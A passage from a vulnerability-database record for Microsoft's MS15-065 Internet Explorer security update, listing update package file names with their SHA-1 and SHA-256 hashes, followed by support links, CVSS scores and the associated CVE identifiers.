class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-KOR.exe</td><td class=\"sbody-td\">CAEACF7616D136B554A7C8C6A48106DE13BF3930</td><td class=\"sbody-td\">3F11E2B0917851A23522D2DED812F5441C3D3EFB9D32C315684FA1D829C20698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-CHS.exe</td><td class=\"sbody-td\">DC3F49E8603E6B6A2D76E6E7C9F855729E04D4F1</td><td class=\"sbody-td\">D880A64D6C7D6D80675605AF077D27C7EDA83257FDDC13191DF3F60D50DA7E52</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-CHT.exe</td><td class=\"sbody-td\">1E53CA0FBB9F52B1A8D7ABBFCCE0F341FDEC573F</td><td class=\"sbody-td\">7258F656B931EAF948348828288B1357D5565F046FCE80AF7E4ED8493571FB7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-CSY.exe</td><td class=\"sbody-td\">8BF1D7D713B64A6DCF827C212072C289FF2CFC4A</td><td class=\"sbody-td\">F0F5EC6BD549C7C0842960986A5462546DDD94B5B07976835E50825A6E8A3E1A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-DEU.exe</td><td class=\"sbody-td\">E0F6073C8C32B111175C65662D0028A273151585</td><td class=\"sbody-td\">3847794BB39AB4EC4FDBE6AC00A3CC491F98D2546BB74D5B432089A6ECCADA24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-ENU.exe</td><td class=\"sbody-td\">43F0E5BD95B35821E396FC30540C0DA4DC21FC93</td><td class=\"sbody-td\">D743B9216494CFCBD2FD24ABBF96A97631610F8103BEE307ACDF2CADD6F6C636</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-ESN.exe</td><td class=\"sbody-td\">DAD941840B57EE485333DED3C28732D8D7FD3357</td><td class=\"sbody-td\">43AAF290F18FAC093AF6D2F8BB39B99509C785D0E71CDD643C542FBBA303E43B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-FRA.exe</td><td class=\"sbody-td\">106BE4B3B4BC5DB94800E1C897BC51835DE23A9D</td><td class=\"sbody-td\">2165ADBDBB5347CC6AF7F7E7DCC7287674F328B9148EF71A22E0509BF8413A93</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-HUN.exe</td><td class=\"sbody-td\">DAC9623090CC5C5D6FE8DC96C2A8224701F7CC33</td><td class=\"sbody-td\">6DAAD479CAC9304DE06C1804608F8AD1DE4259F5F3C3DC89DE907339DDEFA375</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-ITA.exe</td><td class=\"sbody-td\">D936E8F51C08D33CC56475550D7EDA173F2DD6CD</td><td class=\"sbody-td\">32EEC88444C0D552391F99FAFCAD20B00A61E19855BEDCEB421B5CABF496681D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-JPN.exe</td><td class=\"sbody-td\">D68183142D4F0BA712E3938B5244F5B39FD2110A</td><td class=\"sbody-td\">A1A4BF553614A369BF680D127DC33F45B81AF9AC35CC7F191789D90DE9446113</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-KOR.exe</td><td class=\"sbody-td\">0E9545B01964ACB4B30A7228336E9622BD87D5D3</td><td class=\"sbody-td\">462B7367B5935E9922BE5E71FE035FDEE0B6903EB80AA40248D067D1C34E9027</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-NLD.exe</td><td class=\"sbody-td\">CCDC90AA17669E6E38ABD780A22EA9C7E3017276</td><td class=\"sbody-td\">C5AEB83CCDFF5CCB587A45D6899EAAB5657C65D89A796678F55BA1B5BF7AF754</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x86-SVE.exe</td><td class=\"sbody-td\">579F7168B539590E4C758450E32229EFB5A6E962</td><td class=\"sbody-td\">EB36258F053624B967E66F74023AB5E884193972F50B12AB377CD2B1C0F42161</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3065822-x64.msu</td><td class=\"sbody-td\">9E1F25005BF7509AED0C432572325645948911CC</td><td class=\"sbody-td\">A242013787F51E5CB6F12CE1F0A9C5BAD1402A91825253F2F608DB5EB038BC4E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3065822-x86.msu</td><td class=\"sbody-td\">DE0A67FC94409D4DAE386B31338A0D1A13E55703</td><td class=\"sbody-td\">0C92FAA8CE4FE258C6221F1CCAD3C3A8696BB366A35D27A75BA773BABBE43C96</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3074886-x64.msu</td><td class=\"sbody-td\">8EE9EA732B7DA017F6B6A2277C826F677BDDA356</td><td class=\"sbody-td\">5F3245F27467ABF984918518E65C5CB823CCB80237B8FBEE6EC5B6CB9458985B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.0-KB3074886-x86.msu</td><td class=\"sbody-td\">BA82F99EA2DDD51492A552BD8CC6E3DDE4434A21</td><td class=\"sbody-td\">6D6CB431A4263AB79DCFAD359E6E2F5F1BCE173881952E88C823076787E24D29</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3065822-x64.msu</td><td class=\"sbody-td\">E3F5BCE38F1C2C5CB4B7090A6BF33FAC9AA39BCD</td><td class=\"sbody-td\">428F1DAAA19148546C8E07F2741D3C1DEE510A1FF48056E2E71017BD4678E946</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3065822-x86.msu</td><td class=\"sbody-td\">F92AFF29AB85E86C4A9D6FCEB53C8D71134F20DC</td><td class=\"sbody-td\">DC1EA600DF30456FD10776C3EE2A8BEF4717670B3A3DF4C07BBDB8F18CCECB51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3074886-x64.msu</td><td class=\"sbody-td\">178D03D8815ED5068038C169AB936809073BB47E</td><td class=\"sbody-td\">A647AED863CA47A0EA953CDFE16E98BA118EF886CEA6606D8242AE742BDB6D6A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE9-Windows6.1-KB3074886-x86.msu</td><td class=\"sbody-td\">DFD43FF15520E39DDAC8CD089AF0C7237B0824CB</td><td class=\"sbody-td\">B93221A554336B84C9691E652E96A7C65AE66F224C9FCEA915753160593A98AA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3065822-ia64.msu</td><td class=\"sbody-td\">572BA8B5CA27AFF32D0E807F815E284964292277</td><td class=\"sbody-td\">0234BFCFD32DCE26E5ED29B496696B912A8214D2D57DD2A41C8631969AA64F9D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3065822-x64.msu</td><td class=\"sbody-td\">332F17ADFA8F0E1FB12DD69D408F8E49BF3C4008</td><td class=\"sbody-td\">47FB64D5286125806EE96A384BC184AABE088FDC303F93E86E549CFA38302483</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3065822-x86.msu</td><td class=\"sbody-td\">5B08AFF063C52CB6D4074BD99203F2C8FBF02E08</td><td class=\"sbody-td\">F786093C1D5A511B1D48A314E2100EAEDE8DFF6FEB42E8A1F72D424F0AAB1E41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3074886-ia64.msu</td><td class=\"sbody-td\">2F2DB1A04E7C4B54D664544CAAA24252B3D7C442</td><td class=\"sbody-td\">F8B04F7788D6CE69EB993E1FA9D51387C3F85E50F15860D63D8F122CA5068513</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3074886-x64.msu</td><td class=\"sbody-td\">AB69805AB9D03651F935A7FCF8E57CF195390C98</td><td class=\"sbody-td\">E0BA7E612000341E149C27815FF9A01AA892C44512F6FBD2132D603662D9C8ED</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB3074886-x86.msu</td><td class=\"sbody-td\">F88BE7C386E38C42D7FFB0C3128345BFC10E5F2C</td><td class=\"sbody-td\">A81DA65462BFE6DC856BB5CB72F79A095D7477DA0E816BC0F120874F1F591DE9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3065822-ia64.msu</td><td class=\"sbody-td\">0A6F616C25B8D58F9E740386DCFB92017B741939</td><td class=\"sbody-td\">8ED60F88AB519A619F773DD16D0DF628DDA282A15224BE98360677623C4C76EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3065822-x64.msu</td><td class=\"sbody-td\">E66D4720DFDB95EFD76E6E65E80061A9C9858DBC</td><td class=\"sbody-td\">FDA887B4416055264FC0D73D973516C43E8D2F339D5A48EF4145CB44BB5FC862</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3065822-x86.msu</td><td class=\"sbody-td\">73B19A44858849458C46CD6B4F855B64ED2C2A87</td><td class=\"sbody-td\">130018D516F6A0C95B8B9BE8C525E002EA0298A2FA5D9877BA55D2522471D9F1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3074886-ia64.msu</td><td class=\"sbody-td\">AC3A52CB46D3BB289E8457A46634C4C0FCBE7742</td><td class=\"sbody-td\">3FB63DD59C5DA603602CE12F2073EEA902AF79EC6BC24290FCEBED5605B3CD59</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3074886-x64.msu</td><td class=\"sbody-td\">793A91431F1265E9340A0B06E0DBC6BDE171A881</td><td class=\"sbody-td\">486BE9FBC6BD8FD260C0A0600F685FF49F59601E2CE4E29C29BA2F18598B16B1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB3074886-x86.msu</td><td class=\"sbody-td\">3EB2D31EA0B4E8431C9DAE4B8C37053CDB4ED164</td><td class=\"sbody-td\">DA6F99ED9B2D6A12F694B431693B927E3321585F5C4548344BB14269541448B9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3065822-arm.msu</td><td class=\"sbody-td\">64E2E197D1F9F09A5DC0980F49393DA90FE2DD4E</td><td class=\"sbody-td\">44877184D24D64163A79385F0D62DD75047FFBF28B7EFBD4757188746A4F48B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3065822-x64.msu</td><td class=\"sbody-td\">D79A1B9DBA024F1AB48E64670007F257A2750AC5</td><td class=\"sbody-td\">4FECF49F18EE040B88C86F5A5FAD5E157568D46C709E6587A162B5BF8F302715</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3065822-x86.msu</td><td class=\"sbody-td\">DE753CE2AC77733A6AB76A7ECE224480F4D666EF</td><td class=\"sbody-td\">D1235697F11BBE2ACF2271A02DD9A5034F61C8760E18EDE3C22A1D7F2D108360</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3074886-arm.msu</td><td class=\"sbody-td\">DAE6B366040A37F55E2B4F6C5A5806514A9930E6</td><td class=\"sbody-td\">E96E993D159814554DC2898F2F9C6E11C6D96786D628C6FD01A1F06FAC8EA1E1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3074886-x64.msu</td><td class=\"sbody-td\">C527592F4B766CFAD3BCAE0FAF8187B382EB6A61</td><td class=\"sbody-td\">62970F0346A1BCAC3BB2A67CA3AAEB73727F6CA71FDC7BEBEFCD03011F9E3F58</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3074886-x86.msu</td><td class=\"sbody-td\">29CE8038B155D584E53E958007FBCA12A5DEF16C</td><td class=\"sbody-td\">6844635BB6F00147F9E987E4E59E5AFF40D2077E5A43794CB0F4A6B5954B9995</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3075516-arm.msu</td><td class=\"sbody-td\">5147E2A16DCEABA21ECC61C1277BBE215C69D7B9</td><td class=\"sbody-td\">CD58B5EA601E2CE8DB9FB992A38C2BD0D391AFAD10BD532925A106E291E012D2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3075516-x64.msu</td><td class=\"sbody-td\">B5E73DE11540EFAF9658C5FF7A012EA1D32D19BB</td><td class=\"sbody-td\">B97FFF24EDD539CAB4782D9A5881908E10A6D2357102C426A7A5550EA726C4B4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB3075516-x86.msu</td><td class=\"sbody-td\">3E2EE38ADE78063B577B9EEA1BB41A8188475BA3</td><td class=\"sbody-td\">A7CDD8534D4880C412C99C1257CF3DEBDBDE49A752E1AE23D1D43D02630789B6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3065822-arm.msu</td><td class=\"sbody-td\">9B2C14291D8731FD20004E3281A93FF126CD73AA</td><td class=\"sbody-td\">40F2790BFAA4A0348AE73203F579EE0D4F3CAB7CBCB997B60AA8EE1CA178338A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3065822-x64.msu</td><td class=\"sbody-td\">EB7F8227A29892D0A45AFAD4699AD521C99FF7EF</td><td class=\"sbody-td\">58ACA8385FF05DCA08809908CAF7AE232426875742DB4A4A9152BD4D70EDCEA8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3065822-x86.msu</td><td class=\"sbody-td\">65A8ED18C33D937F3AAD9654FD3030A8B03E791E</td><td class=\"sbody-td\">12E206197641F13E2CBFE01ABB0A16299879F164E7E15CA4E04FE4F086AED33D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3074886-arm.msu</td><td class=\"sbody-td\">5177EF0DDC6781447CC4877FBF1198092A2C636B</td><td class=\"sbody-td\">3FE9D14C81A8F34B4E45890683C84E30E5743B97943576F582BA01ED6BD48ABB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3074886-x64.msu</td><td class=\"sbody-td\">3887B71F52B644374ECA5C86E4DC82BA9F39F850</td><td class=\"sbody-td\">71BAAA581140C1B14794F66A0A336AF0019F50026397A107BB318CD654D92A61</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3074886-x86.msu</td><td class=\"sbody-td\">BA68CD88B34285B8ABEA28392DE01F2074ACB0DC</td><td class=\"sbody-td\">008D9C4A3FD7F6C5FD5DE88E70B3832BFCD0D576ED94D46C5CA4B2A70ECDA58C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3075516-arm.msu</td><td class=\"sbody-td\">773A8C5CB02304FF7B08231671C46B4257E27125</td><td class=\"sbody-td\">8DECF6843A139F01CFA8DA444435B03A36016CCB88CFAE6C1477D00F600D72AA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3075516-x64.msu</td><td class=\"sbody-td\">C5853C372E17498FC7C8278BFC670530244BFD8E</td><td class=\"sbody-td\">097C81220D9155DFC617E00E178B6832A33F0F15CAD92F293EF367B44AE2EE19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB3075516-x86.msu</td><td class=\"sbody-td\">FA56F0B7A23B5119E90F9F1897C943D9D205CC73</td><td class=\"sbody-td\">468E79C6F73F3709B0DCA59D2AA8B360C4E7BEC00D45566B8A2370906B15FE8E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-ia64-DEU.exe</td><td class=\"sbody-td\">F26628CAEAF0BDEE267407D26A6765B6ED2ABBA8</td><td class=\"sbody-td\">A46511424AF1365FD80916C6183C7919C86D1B1504D4A2E1E24B74EB15335E42</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-ia64-ENU.exe</td><td class=\"sbody-td\">803E9AB7D9CD71B161935EC033CE71F297A1BF28</td><td class=\"sbody-td\">E7DD0D83852737AD8BB6A21B14D9E6B044730003E0430EA3195C34AFBB24D08E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-ia64-FRA.exe</td><td class=\"sbody-td\">FD38C6A1668C78B04B3A146F2C22473F89C959A7</td><td class=\"sbody-td\">EDB995BC4FDEDC5E132B055C3AAADC599667A6496F9C6881213261D662D92C18</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-ia64-JPN.exe</td><td class=\"sbody-td\">AB28E517CE7780D7FB2BE27C8E17A6A1E301041D</td><td class=\"sbody-td\">29E56F436A50D41E9B3AE3D7E358E202084DB92C9A3A027F20668729FF00D115</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-CHS.exe</td><td class=\"sbody-td\">CE90681715DAB8BD7C1D37089C41C6E45C9F9769</td><td class=\"sbody-td\">62A5B762943B10A5ED817BA704A81711038FA6DA95D1495D7164D3E787BA840A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-CHT.exe</td><td class=\"sbody-td\">E656DBC5E8C389148C53C2E589DC36A2F70882BE</td><td class=\"sbody-td\">C5E9236B9352B26539B27078C08CD3807FD7C1C77FF7929908414F7D2C0F5B49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-DEU.exe</td><td class=\"sbody-td\">5E8ED75C81CC49FDA4358313E2ADF8785091ADAC</td><td class=\"sbody-td\">BE0741C53B25E53D62F82740DA6EA163B6CA5C0E0CABD22DFFBE19E8E5CBD5DB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-FRA.exe</td><td class=\"sbody-td\">5744B84CFE249CAB9762CCDB584B7640D73CC54B</td><td class=\"sbody-td\">002B845C728F0117117FAE8466576F01A64F0861F68339654F2D34914D94AF9C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-ITA.exe</td><td class=\"sbody-td\">F67C562E7BC21DFBDE62B8516EDFAA27DFBB965D</td><td class=\"sbody-td\">30FAA47D6088B85A4E04E28C383685EE0A11B8018E280466F0D4330718333F1E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-JPN.exe</td><td class=\"sbody-td\">98BE916457D5985D5896FCA20E9EF4339067E330</td><td class=\"sbody-td\">C6168C2E3501E2671CB70E8F6A94F05568588CF9D8A9FFBACDC53B4054B1EEE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x64-KOR.exe</td><td class=\"sbody-td\">B43521FC804C6E449DC4F229F5F01BCA35139FA6</td><td class=\"sbody-td\">6A56CD2B0E59F837ADAEF743CF554501F6257F1FA9758180D9E75C80931AB4AA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-CHS.exe</td><td class=\"sbody-td\">7DFC34457FBA5D7053DD6C101829D82909DF4A69</td><td class=\"sbody-td\">B450D418E3E3FFE6AEFF76172F1A5CC3E83246748B85228620708CF4710EE18A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-CHT.exe</td><td class=\"sbody-td\">B280C0AB3ACE343F0F15C874ED2F60EFB565AE22</td><td class=\"sbody-td\">39F26910598C0294F238AA90B748E250D55DAC5322759CCAB09558B3E71CF543</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-CSY.exe</td><td class=\"sbody-td\">36226E198568E72DA8E470DC752965C805EA5693</td><td class=\"sbody-td\">D6808A8B9F7486DE9384C8C115B7ED8131A6471D7CDADDC418B277FA359F879A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-DEU.exe</td><td class=\"sbody-td\">32641CACE9561A510E8852AF9C38556FC9C4CE81</td><td class=\"sbody-td\">FD13B4AC3D05814E2E670100EE07E0CDD3A24F5E538A0013AF334EB1CEA68418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-ENU.exe</td><td class=\"sbody-td\">0BF660F5824DF5965A24DCD31705EAE1A7028360</td><td class=\"sbody-td\">AF143C17DC34D2B22F7AF1245BD2A6CBFECABA2F4AE3676D7BC504F5E5F300D8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-ESN.exe</td><td class=\"sbody-td\">E2D9FC2B23783D57A1EF2AEA4CF9F760E81BFCBF</td><td class=\"sbody-td\">D4B141ECE8048EB02985FE631153419F63D1B9EA035C18D9B33EE2EB65837DA1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-FRA.exe</td><td class=\"sbody-td\">67AACA441A27FC6A2B8ED56F4391B889D19FAAB0</td><td class=\"sbody-td\">ECB02D586482B74A051C8BA96AED8AFB456D1E2D2C5AEFC198DB5A52286C0FCD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-HUN.exe</td><td class=\"sbody-td\">99CC91B6596E4E25B5425F779CF71DAEFC2EEC2D</td><td class=\"sbody-td\">50CE0A40E88655304AB3BF4DB695C2478D1184BDC503EAE36DC46F27B4E462B2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-ITA.exe</td><td class=\"sbody-td\">0457031115E37836024A5C01C0DEB6C76EC54CC7</td><td class=\"sbody-td\">51A2F3BB848F0D157427F0087949ADC5F6B0B1C14040EC12145EBE053C4DFD8C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-JPN.exe</td><td class=\"sbody-td\">2BD6557BD15D5E9C1C0019256DC0D4F76C3E9E96</td><td class=\"sbody-td\">ACED3861499889CF158F2697E71A19F9285FA8484F4B85DAE2BEADAA28D0D0A5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-KOR.exe</td><td class=\"sbody-td\">A86D5D271DE48EE03817E0034266EC805085F751</td><td class=\"sbody-td\">6CD47ADC1614B1478D337A702EED4364148D6B8435CF68E112E90B878A540646</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-NLD.exe</td><td class=\"sbody-td\">1B27373C97F6461C27A0A91BD1B391FCA26A74FC</td><td class=\"sbody-td\">7CA54AA578DE2FDAF83FA6124EDC4C54333FCD373BA3724612FD19E6A2396E3C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB3065822-x86-SVE.exe</td><td class=\"sbody-td\">0871C9CCFCD6CA06368C6ADD8F8D7C68DBC17515</td><td class=\"sbody-td\">983D8D1C1F2063532E15E6D45B62444A9F52D5224B965EC3CD160A18BA9BA33E</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-23\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-24\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-25\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-26\" target=\"_self\">International Support</a></div><br/></span></div></div></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "mskb", "title": "MS15-065: Security update for Internet Explorer: July 14, 2015", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2391", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-1729", "CVE-2015-2404", "CVE-2015-2403", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", "CVE-2015-2398", "CVE-2015-2425", "CVE-2015-2411", "CVE-2015-1733", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2406", "CVE-2015-2421", "CVE-2015-2389"], "modified": "2015-11-09T07:45:32", "id": "KB3076321", "href": "https://support.microsoft.com/en-us/help/3076321/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:47", "description": "Internet Explorer and VBScript multiple security vulnerabilities, RDP code execution, Hyper-V code execution, multiple privilege escalations.", "edition": 2, "cvss3": {}, "published": "2015-07-19T00:00:00", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2367", "CVE-2015-2391", "CVE-2015-2387", "CVE-2015-2362", "CVE-2015-2365", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2373", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-2369", "CVE-2015-2366", "CVE-2015-1729", "CVE-2015-2417", "CVE-2015-2371", "CVE-2015-2404", "CVE-2015-2361", "CVE-2015-2403", "CVE-2015-2374", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", "CVE-2015-2398", "CVE-2015-2368", "CVE-2015-2425", "CVE-2015-2416", "CVE-2015-2364", "CVE-2015-2411", "CVE-2015-2363", "CVE-2015-1733", "CVE-2015-2370", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2381", "CVE-2015-2406", "CVE-2015-2421", "CVE-2015-2389"], "modified": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14594", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}